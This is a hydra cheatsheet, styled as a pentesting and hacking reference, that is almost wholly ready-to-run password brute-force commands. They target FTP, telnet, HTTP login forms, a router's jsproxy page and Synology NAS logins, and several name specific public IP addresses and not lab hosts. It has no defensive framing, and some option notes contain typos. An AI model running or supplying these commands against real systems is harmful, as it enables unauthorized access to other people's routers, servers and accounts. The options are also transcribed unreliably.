🖥️hydra

➡️This is a command-line reference manual for commands and command combinations that you don’t use often enough to remember it. This cheatsheet explains the hydra command with important options and switches using examples.

▁ ▂ ▃ ▄ ꧁ 🔴☠ COMMANDLINE-KUNGFU WITH CHEATSHEETS ☠🔴꧂▅ ▃ ▂ ▁

#            ██╗  ██╗██╗   ██╗██████╗ ██████╗  █████╗ 
#            ██║  ██║╚██╗ ██╔╝██╔══██╗██╔══██╗██╔══██╗
#            ███████║ ╚████╔╝ ██║  ██║██████╔╝███████║
#            ██╔══██║  ╚██╔╝  ██║  ██║██╔══██╗██╔══██║
#            ██║  ██║   ██║   ██████╔╝██║  ██║██║  ██║
#            ╚═╝  ╚═╝   ╚═╝   ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝

#hydra does not have a native default wordlist, using the Rockyou list is suggested

#example brute force crack on ftp server
hydra -t 1 -l admin -P [path to password.lst] -vV [IPaddress] ftp
--> -t # = preform # tasks
--> -l NAME = try to log in with NAME
--> -P [filepath] = Try password
--> -vV = verbose mode, showing the login+pass for each attempt

#check for joe accounts by adding modifier -e s

#to write found login+pass combinations to fiel, add modifier -0 [fileanme]

Router von cam4 
http://94.75.75.242/jsproxy
username=admin&password=&submit.htm%3Flogin.htm=Send

hydra 94.75.75.242 http-post-form "/jsproxy:username=admin&password= &submit.htm%3Flogin.htm=Send:F=login"

hydra -l admin -P /dic/r-pass.txt -t 1 -e nsr -f -vV -s 80 192.168.1.1 http-get-form "/index.cgi:client_login=^USER^&client_password=^PASS^:errorMsg"
hydra -l admin -P \wordlist.dic -t 1 -e nsr -f -vV -s 80 93.171.144.223 http-post-form "/index.cgi:name=^USER^&password=^PASS^:error"

hydra -l admin -P \wordlist.dic -t 16 -e nsr -f -vV -s 21 93.171.144.223 telnet

# FTP Server Hacking with hydra
hydra 192.168.225.100 ftp -v -v -l admin -P /password.lst -e ns -t 5 -w 30 -m / -f
hydra 192.168.225.100 ftp -v -v -L userlist.lst -P /password.lst -e ns -t 5 -w 30 -m / -f
hydra 192.168.225.100 http-get -v -v -l admin -P /password.lst -e ns -t 5 -w 30 -m / -f

# Bruteforce Synology NAS Logins with Hydra
hydra -I -V -T 5 -t 2 -s 5001 -M /tmp/syno https-post-form '/webman/login.cgi?enable_syno_token=yes:username=^USER^&passwd=^PASS^&OTPcode=:S=true' -L ./ruby-syno-brut/user -P ruby-syno-brut/passlist-short-2.txt

#==============================##==============================#
# CMD 						       #
#==============================##==============================#
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░

  █║▌│║█║▌★ KALI ★ PARROT ★ DEBIAN 🔴 PENTESTING ★ HACKING ★ █║▌│║█║▌

              ██╗ ██╗ ██████╗  ██████╗ ██╗  ██╗███████╗██████╗
             ████████╗██╔══██╗██╔═══██╗╚██╗██╔╝██╔════╝██╔══██╗
             ╚██╔═██╔╝██║  ██║██║   ██║ ╚███╔╝ █████╗  ██║  ██║
             ████████╗██║  ██║██║   ██║ ██╔██╗ ██╔══╝  ██║  ██║
             ╚██╔═██╔╝██████╔╝╚██████╔╝██╔╝ ██╗███████╗██████╔╝
              ╚═╝ ╚═╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═════╝

               █║▌│║█║▌ WITH COMMANDLINE-KUNGFU POWER █║▌│║█║▌

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░